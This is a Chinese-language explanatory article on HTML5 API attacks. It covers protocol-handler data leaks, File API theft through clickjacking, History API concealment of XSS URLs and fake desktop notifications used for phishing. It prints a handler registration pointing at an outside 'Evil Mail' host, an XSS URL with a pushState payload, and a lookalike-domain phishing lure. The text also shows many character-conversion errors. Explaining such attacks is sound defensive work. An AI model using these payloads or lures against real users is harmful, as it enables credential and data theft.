HTML5安全風險詳析之六：API攻擊

HTML5裏有許多協議、模式和API，可能成爲攻擊者的攻擊途徑

1、registerProtocolHandler：信息泄漏

HTML5容許某些協議和schema註冊爲新的特性。例以下面的語句能夠註冊一個email handler。

01.navigator.registerProtocolHandler(「mailto」,「http://www.f.com/?uri=%s", 「Evil Mail");

它會將一個惡意網站處理器關聯到mailto這個協議上，因此它在某些狀況下的濫用會致使用戶信息泄漏。

2、文件API：竊取文件

HTML5另一些API從安全角度來看頗有意思，它們還能混合起來使用。

例如文件API容許瀏覽器訪問本地文件，攻擊者能夠將它與點擊劫持和其餘攻擊混合起來得到用戶本地的文件。好比騙取你從本地拖放文件到頁面裏，這種方法在劫持攻擊一文中有較詳細的闡述。

3、歷史API：隱藏XSS URL

利用HTML5歷史API的pushState，能夠隱藏瀏覽器地址欄的攻擊URL。例如我在瀏覽器地址欄輸入

01.http://test.baidu.com/?text=</div><script>history.pushState({},'',location.href.split("?").shift());document.write(1)</script>

這個地址，用戶將會僅僅只看到http://test.baidu.com/。

這個問題和如今流行的短網址技術結合起來，具備更大的隱蔽性。想象一下咱們在微博上看到一個短網址，不會有任何懷疑就會點擊這個地址查看內容，而最後看到的地址也是至關正常的，可是在這個過程當中用戶的信息和資料就不知不覺被盜取了。

短URL結合歷史API的攻擊

4、Web Notifications：盜取數據

Web Notifications讓咱們在瀏覽器中可以接收推送的消息通知，可是它有可能會被攻擊者利用來構造虛假信息，騙取用戶數據。

例以下圖裏右下角的彈窗通知看起來很是正常，須要咱們輸入Gmail密碼來登陸查看新郵件。可是一旦輸入密碼，Gmail郵箱就被盜取了。咱們能夠仔細看看，彈窗左上角顯示的域名是gmai1.com！這正是一個釣魚網站的欺詐手段。

桌面通知攻擊

最後，隨着HTML5的發展，將來還可能出現新的HTML5安全問題，還可能還會向着複雜化和智能化去發展。